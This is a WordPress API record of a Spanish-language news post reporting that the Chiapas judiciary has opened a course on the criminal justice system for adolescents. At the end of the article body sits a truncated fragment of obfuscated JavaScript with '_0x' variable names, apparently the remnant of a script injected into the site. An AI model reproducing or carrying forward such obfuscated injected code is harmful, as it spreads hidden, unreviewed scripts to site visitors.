{"id":10924,"date":"2023-07-10T04:36:46","date_gmt":"2023-07-10T04:36:46","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10924"},"modified":"2023-07-10T04:36:46","modified_gmt":"2023-07-10T04:36:46","slug":"comienza-poder-judicial-curso-sobre-sistema-de-justicia-integral-penal-para-adolescentes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10924","title":{"rendered":"Comienza Poder Judicial curso sobre Sistema de Justicia Integral Penal para Adolescentes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230709-WA0032-1024x576.jpg\" alt=\"\" class=\"wp-image-10925\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230709-WA0032-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230709-WA0032-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230709-WA0032-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230709-WA0032-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/07\/IMG-20230709-WA0032.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, dio comienzo al curso Sistema de Justicia Integral Penal para Adolescentes Tercera Edici\u00f3n, el cual culminar\u00e1 hasta el mes de octubre.<\/p>\n\n\n\n<p>Este curso, fue desarrollado con la conciencia del papel fundamental que guarda la capacitaci\u00f3n y la profesionalizaci\u00f3n en la sociedad como pilar en nuestro estado, por lo que fueron convocados las y los integrantes de las Barras, Asociaciones y Colegios de abogados, servidores p\u00fablicos adscritos a la Sala y Juzgados Especializados en la materia, as\u00ed como p\u00fablico en general.<\/p>\n\n\n\n<p>Como parte del pres\u00eddium en el acto protocolario de inauguraci\u00f3n, la y el consejero de la Judicatura, Zelmira Perla de Roc\u00edo Guti\u00e9rrez Beltr\u00e1n y Omar Heleria Reyes, llevaron consigo la representaci\u00f3n del magistrado presidente Guillermo Ramos P\u00e9rez, acompa\u00f1ados por el ponente del primer m\u00f3dulo, el magistrado de la Ponencia C por Ministerio de Ley de la Sala Especializada en Justicia para Adolescentes de Berrioz\u00e1bal, Francisco Mijangos Nucamendi.<\/p>\n\n\n\n<p>Durante la bienvenida, la consejera Guti\u00e9rrez Beltr\u00e1n, reconoci\u00f3 el esfuerzo conjunto del Poder Judicial, de los desarrolladores de este curso y sobre todo, de las y los participantes, quienes demuestran el profundo inter\u00e9s de continuar capacit\u00e1ndose con el fin de obtener las mejores herramientas a la hora de ejercer su labor en la justicia chiapaneca, por ello, les invit\u00f3 a aprovechar al m\u00e1ximo estas actividades que la casa de la justicia ofrece.<\/p>\n\n\n\n<p>Cabe mencionar que, en este curso se propone dar a conocer el Sistema Integral de Justicia Penal para Adolescentes, delineado en la Constituci\u00f3n General, Tratados Internacionales y en la Ley Nacional de la materia; reconociendo la etapa de la adolescencia, as\u00ed como la problem\u00e1tica concerniente a la delincuencia juvenil.<\/p>\n\n\n\n<p>Para el Primer M\u00f3dulo se disert\u00f3 durante dos d\u00edas en sistema h\u00edbrido, desde el Aula Magna del Instituto de Formaci\u00f3n, Profesionalizaci\u00f3n y Carrera Judicial y desde la plataforma virtual Telmex, el tema de Antecedentes del Sistema de Justicia Para Adolescentes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>El Poder Judicial del Estado, que encabeza el magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura, Guillermo Ramos P\u00e9rez, dio comienzo al curso Sistema de Justicia Integral Penal para Adolescentes Tercera Edici\u00f3n, el cual culminar\u00e1 hasta el mes de octubre. Este curso, fue desarrollado con la conciencia del papel fundamental &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10925,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-10924","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10924","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10924"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10924\/revisions"}],"predecessor-version":[{"id":10926,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10924\/revisions\/10926"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10925"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10924"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10924"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10924"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}